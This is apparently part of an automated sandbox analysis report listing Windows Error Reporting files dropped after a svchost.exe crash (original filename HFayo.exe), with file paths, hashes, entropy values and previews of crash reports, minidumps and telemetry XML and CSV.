Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.4.1.0.8.5.5.4.4.2.5.3.0.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.4.1.0.8.5.6.2.5.5.0.3.2.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.c.c.1.f.d.1.a.-.b.0.c.d.-.4.7.3.7.-.9.e.b.1.-.8.a.b.c.1.1.b.8.1.a.c.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.c.5.9.0.2.8.2.-.1.e.9.b.-.4.a.8.c.-.9.3.1.f.-.3.a.7.b.9.d.f.2.3.6.6.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.H.F.a.y.o...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.7.0.-.0.0.0.1.-.0.0.1.5.-.5.c.2.2.-.9.5.6.b.c.c.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.7.f.9.2.6.b.4.0.7.c.9.e.0.0.4.2.7.1.3.c.a.8.6.1.0.4.e.f.0.6.a.0.0.0.0.0.0.0.0.!.0.0.0.0.f.d.e.0.4.f.b.3.d.9.0.5.c.f.3.1.4.a.2.2.8.3.6.2.7.6.b.c.6.6.8.b.f.c.e.f.2.e.5.a.!.s.v.c.h.o.s.t...e.x.e.....T.a.r.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_svchost.exe_dae5beae797db3ecbb8fa0e3475fee7a94437a_7c70d214_53517162-9d0a-4a4e-8846-387dccff8f9e\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1252742524535424
Encrypted:	false
SSDEEP:	192:0cWEzb4h0uvduIay5eFlJsfZFsB5mzuiFZZ24lO8Mt:lVb4iuvdtaKUZ5mzuiFZY4lO8M
MD5:	817FF741C63DA01FE3A68E75B0408EBB
SHA1:	6377E91CE2034A3D28D1ED15C6E041839734EDEE
SHA-256:	A9366B27D2B4FED673DC0986DCCC26D76AD35DFDC336BE5D9D693F6E4804C605
SHA-512:	3A5259AF0C905E9CFF5F9362552D72C6F32FD348EA5D89C401BE09992BF8F9B586A34C71881C1617DD8FD945333A70BB35995F3030BD3EC32C2C2B5C525097D9
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.4.1.0.8.4.5.9.0.5.4.5.6.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.4.1.0.8.4.6.9.0.5.5.0.2.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.3.5.1.7.1.6.2.-.9.d.0.a.-.4.a.4.e.-.8.8.4.6.-.3.8.7.d.c.c.f.f.8.f.9.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.e.f.e.c.b.b.2.-.a.0.e.4.-.4.1.2.7.-.a.7.b.5.-.5.f.8.3.b.a.0.c.7.4.7.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.H.F.a.y.o...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.7.1.0.-.0.0.0.1.-.0.0.1.5.-.e.6.a.b.-.5.8.6.6.c.c.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.7.f.9.2.6.b.4.0.7.c.9.e.0.0.4.2.7.1.3.c.a.8.6.1.0.4.e.f.0.6.a.0.0.0.0.0.0.0.0.!.0.0.0.0.f.d.e.0.4.f.b.3.d.9.0.5.c.f.3.1.4.a.2.2.8.3.6.2.7.6.b.c.6.6.8.b.f.c.e.f.2.e.5.a.!.s.v.c.h.o.s.t...e.x.e.....T.a.r.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_svchost.exe_dae5beae797db3ecbb8fa0e3475fee7a94437a_7c70d214_8052cdf5-e893-4404-94d0-50bb24e27abc\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1318104559849218
Encrypted:	false
SSDEEP:	192:4g7gI/h0uvduIaWTjsPl/glZFEZXzuiFZZ24lO8Mt:SI/iuvdtaij0JXzuiFZY4lO8M
MD5:	8C6DA1D0BB3CC416A3A2FDA7BE0600FF
SHA1:	AF94F713F03DB9DF430AFA28601CC2720216B59A
SHA-256:	791D6ADDE378031DEBF39C3FCB92A07E5DAAC466F4CA9E1922FB1518C5B7D82D
SHA-512:	ED739E5A597037B455E6E81828141745FCE7184BA51976A9C3CA964F8E8E0F218D724D7066A3318D9BA699F901DF6AAFE40101A123CC68404BC67799253F0360
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.4.1.0.8.4.7.2.8.7.9.3.7.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.4.1.0.8.4.8.8.1.9.1.7.8.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.0.5.2.c.d.f.5.-.e.8.9.3.-.4.4.0.4.-.9.4.d.0.-.5.0.b.b.2.4.e.2.7.a.b.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.2.c.d.f.3.6.7.-.7.e.7.7.-.4.5.c.9.-.b.e.4.d.-.a.f.8.a.3.1.3.6.0.4.9.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.H.F.a.y.o...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.b.c.-.0.0.0.1.-.0.0.1.5.-.8.7.1.c.-.c.7.6.5.c.c.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.7.f.9.2.6.b.4.0.7.c.9.e.0.0.4.2.7.1.3.c.a.8.6.1.0.4.e.f.0.6.a.0.0.0.0.0.0.0.0.!.0.0.0.0.f.d.e.0.4.f.b.3.d.9.0.5.c.f.3.1.4.a.2.2.8.3.6.2.7.6.b.c.6.6.8.b.f.c.e.f.2.e.5.a.!.s.v.c.h.o.s.t...e.x.e.....T.a.r.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_svchost.exe_dae5beae797db3ecbb8fa0e3475fee7a94437a_7c70d214_dfc11d99-f50b-48ba-81f2-80667f6ca4c0\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.131559414629139
Encrypted:	false
SSDEEP:	192:Kfjm03h0uvduIaK5eFlJsfZFsB5TzuiF+Z24lO8Mt:Ym03iuvdtaCUZ5TzuiF+Y4lO8M
MD5:	2B3EA0900219ADA5B6FDD87B551314FA
SHA1:	D1BA58B5C50EFA9017117A1C627BFDDB890DC995
SHA-256:	BB69545F2BCDF452C3CEC6E49C87A05CBC8CA182D8C7AE9AECF0FF91353440A4
SHA-512:	4EAB22A6E8848FA4502632464E1BDE5EA453EC66D458B18334104D89DA7A02C4906C5BE83B6D91902C6034A6331D1FD09F573778F749E79A27B2E3F9D389A33C
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.4.1.0.8.6.3.3.6.3.2.0.2.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.4.1.0.8.6.4.5.6.6.3.3.9.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.f.c.1.1.d.9.9.-.f.5.0.b.-.4.8.b.a.-.8.1.f.2.-.8.0.6.6.7.f.6.c.a.4.c.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.d.f.5.2.7.c.0.-.d.1.e.9.-.4.8.0.f.-.b.1.5.f.-.1.1.c.e.3.9.1.9.8.2.4.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.c.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.H.F.a.y.o...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.9.4.-.0.0.0.1.-.0.0.1.5.-.f.7.0.6.-.9.e.7.0.c.c.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.7.f.9.2.6.b.4.0.7.c.9.e.0.0.4.2.7.1.3.c.a.8.6.1.0.4.e.f.0.6.a.0.0.0.0.0.0.0.0.!.0.0.0.0.f.d.e.0.4.f.b.3.d.9.0.5.c.f.3.1.4.a.2.2.8.3.6.2.7.6.b.c.6.6.8.b.f.c.e.f.2.e.5.a.!.s.v.c.h.o.s.t...e.x.e.....T.a.r.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB0D8.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Thu Jul 25 19:54:06 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	548070
Entropy (8bit):	3.550727719719395
Encrypted:	false
SSDEEP:	6144:1HgTXgq0iadJTOkqeo3QhgnvpjyYZx5tYCPyZM2YA:eTeXvTOkqecQhQZpSwA
MD5:	979F3D629F159AF8CF8454AC606D070E
SHA1:	E4FC680E0BDCA7A384170C4A983648EC005E9662
SHA-256:	FE3A7F629DFBE30B0AA9831992A6EB6AAF01A2F4380C81B1C3BF9B6A6D1227AC
SHA-512:	972487189391A56FC3D34ADF4733B22BAAD46812E2B848395959935CE4C8EE0F1D1D1D0C5FC1B800F693BA5FAE3B75A249EE332DF00251496DF2D4246FADCDFC
Malicious:	false
Preview:	MDMP..a..... .......^..f............D...............d.......$...t!......`:...!......d}..\|...........l.......8...........T...............F............[...........]..............................................................................eJ......\|^......Lw......................T...........[..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB388.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6804
Entropy (8bit):	3.7359171220436496
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbesX6LYKYZLKMkfO4Z5aM4Uw89bRU4V0fvLbm:R6l7wVeJesXGY3L09prw89bRUbfvLbm
MD5:	A43F7C24308FE7D583E361D7CB44D1B0
SHA1:	2C58E7CC0796DCF238D99DEA8151ED1492641040
SHA-256:	68AC00DC6A92D2ADEF8F0BACFAAB67EEBB0725705A261F608A85E107F3456DAD
SHA-512:	0C0D9CA603F29BE19C9CF2E5CA493ED28F9504BD026A21A74BC30604C4B45E7E52A32F999564206A929D7B0E4C3CED07EFCA45915E208729DBD1D97B8D7B6DEF
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.8.0.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB3E7.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4739
Entropy (8bit):	4.489002759170567
Encrypted:	false
SSDEEP:	48:cvIwWl8zsFJg771I9QzWpW8VYYYm8M4JCMlF+9yq85qT1i2+IWd:uIjffI7nC7VgJC3j1i2+IWd
MD5:	954FCEF32456CB8684B2D0E3F5D77C4D
SHA1:	299A89AE25169FE8D17E22CF7EB5AD6F1B4673BD
SHA-256:	3876C0A987AC5046AE08E67BE7D9A8659E2E3B04DC830DBBF6021180DDE3C0E7
SHA-512:	15A4D0BCC6BB91AD6E7953584610CFF2ED98957F0F07D1677D88D405980B1313AFDF550E9D6059025CCDE11CB34A7B515D524CF218913D45A7EF31F1053B9554
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="426896" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB3F5.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	84698
Entropy (8bit):	3.039456615983498
Encrypted:	false
SSDEEP:	768:p4Qafodxl0q5sFdYLQPNYgnC8y2a7PQzJg70aGydN:p1jTlz5sHYkNnC8y2a7PQ4GydN
MD5:	D93049D4B9643F1C80EE3B19FB52E1A0
SHA1:	D35DBCF27D9FFC6009A5C6370DEFFB59B90BFEF0
SHA-256:	8C64A036347D9A047D638E978CF7AFA1FC2224BDE89CFBDC563A81A8F8EA5981
SHA-512:	D1A842B18F32C49505048CFEAA8D0DA73C6984B0C0BE71D00CCA71B37DAF967060A2C291BD9BE7648FB179914CDB750B16E26A67E0D77C07B219E97D704CB055
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB482.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.684513265022297
Encrypted:	false
SSDEEP:	96:TiZYWxrnCUMsYyYiWUH1YEZG7Mt8iSHlTbwplAWaGiEWMgjoaIhF3:2ZDxX14IBaGiEWMgjoNhF3
MD5:	69DD841FAD129B3433523F5244F483F2
SHA1:	FF28044623259CEA1B658713A9362A6518AB1D38
SHA-256:	A189BA1C20DB189FE18291B162D410AAEBB111EDBA3141877ECCBDC9EE71AAFA
SHA-512:	7264E5D306DD6148932C4127C4DAB61FE11F7F344F529FB3467516E4BDEE5C3ABD96383C8A4F2AAC71B574FAAA9EA82C8ED09C0D865978DBF74C067F6B291140
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB646.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Thu Jul 25 19:54:08 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	547832
Entropy (8bit):	3.562054249403885
Encrypted:	false
SSDEEP:	6144:rDDgTXzRrHs1ME6sqMT3Q+CSRiDKIp5BfBxIHl8kpBI4:UTbwqMzQ+CSRiGVI4
MD5:	AC2F9B9DD04C77C1561AAFCAC9AF1F40
SHA1:	DB57E2D73295D011831E262257B2A16C9A02C3B3
SHA-256:	57CB73CD2058928DAFE0F64DBFA974AB0FA992FEDEE1A9A4F6F8CED850CEB706
SHA-512:	FE69BEB86EB9D4BB731801C4802034F526FFF416E4FC29356D8595E8DE721136D430FC7F88EACD77E1E20F3DDAC3D9547CC393C938931193EAD8C5E9E06B93EB
Malicious:	false
Preview:	MDMP..a..... .......`..f............D...........\|...d.......$....!.......:...".......}..4...........l.......8...........T...............X-...........\...........^..............................................................................eJ......._......Lw......................T...........Z..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBAFA.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8824
Entropy (8bit):	3.7092479300577734
Encrypted:	false
SSDEEP:	192:R6l7wVeJY8tP6YEN3mEDgmf3L09prm89bvFWf5Hlm:R6lXJLl6YEMQgmf3L2v0fS
MD5:	06AD5512376A8AF91A16F78C620C90E5
SHA1:	1F58987EE0C81484301915CAC567ECC38C7B4BF6
SHA-256:	EB1426EF0EEFF1E0AF90E88F1442B8CC17B48489708346C9C6C6ABDA5B51BFA5
SHA-512:	F031A358B7B6C36DEE60DDF6DEC8304858B9738D70CFCFB42DB9FA93149A161D741D7FD9DF18918E95A755D7193D7B3E4AF41E50F3437CC673F0FC1A6AF1C215
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.2.6.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBB3A.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4739
Entropy (8bit):	4.491729677195848
Encrypted:	false
SSDEEP:	48:cvIwWl8zsFJg771I9QzWpW8VYlYm8M4JCMlFSDeyq85q+Zi2+Ivd:uIjffI7nC7VRJCJDeWi2+Ivd
MD5:	46163B9FBE4F18AEFD6F260262249134
SHA1:	6E929273E83B0DF5163157EF6C28E5C52983C447
SHA-256:	7BBB067DE9D6A2091C7D40FE09D33897BC556FB83811D3DB104F3424F9CE4F0D
SHA-512:	7C40D9995E691AD51DA61F9556FF0CCAB6977C15CF9A90FFB4CC808AE5E3D2E52A74F86179C45B5C532C81791A0E09CA0C07BBCB19AF7C189B6DB18A3E55F523
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="426896" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBB4A.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	84514
Entropy (8bit):	3.0391225661906245
Encrypted:	false
SSDEEP:	768:WsxaQp9D9OVSaBhhQL/2c0yNDgdCWMt2ah7Q6Jg90aGydWH4:bxnh9qSaY/2OsdCWMt2ah7Q5GydWH4
MD5:	5AB3422DB91CED8DB057776A8848E462
SHA1:	36F8F659D5F4102B610478E5088BFBB4F22B80BA
SHA-256:	CD5D0CF549191A18411748AD8E900FA10951A0F71235712E3E46CE99491692B3
SHA-512:	A5211CDB110B4BF5628C40357C55A4E32A128C40877B45707CE3971030E01024E568A3E360E94DAE20AD1367EA346E03B377E02A2584DF7BFDC35D3C9792D362
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.